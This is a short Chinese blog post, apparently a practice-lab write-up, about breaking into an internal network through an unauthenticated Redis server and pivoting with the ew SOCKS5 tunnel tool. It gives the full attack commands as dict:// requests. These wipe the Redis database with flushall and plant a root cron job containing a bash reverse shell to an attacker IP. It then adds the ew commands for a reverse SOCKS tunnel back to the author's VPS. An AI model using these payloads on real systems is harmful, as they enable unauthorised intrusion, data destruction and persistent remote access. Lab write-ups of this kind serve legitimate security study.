最近在打一个靶机的时候遇到了ew做Socks5代理进行内网渗透,在这里做一下记录。
这里首先存在一个redis未授权访问
1 2 3 4 5 6 7 8 9
| dict://172.19.0.5:6379/flushall //将整个redis数据库删除 dict://172.19.0.5:6379/set x "\n* * * * * bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1\n" dict://172.19.0.5:6379/config set dir /var/spool/cron/ dict://172.19.0.5:6379/config set dbfilename root dict://172.19.0.5:6379/save
|
然后
我拿到了redis服务器的root权限,扫描内网发现存在web服务。
然后在我的vps上执行
1
| ./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
|
这里的意思就是监听1080和1024端口,攻击机访问1080端口,靶机访问1024端口
1
| ./ew -s rssocks -d xxx.xxx.xxx.xxx -e 1024数据库
|
这是在我拿到的redis服务器上执行的命令,建立起隧道连接。
这里在我的攻击机使用socks5代理,服务器地址填写我的vps地址,然后就可以直接在浏览器访问内网的web服务了。
当然这里也可以使用其他的socks5代理工具来进行代理。
最后更新时间:
版权所有,转载署名。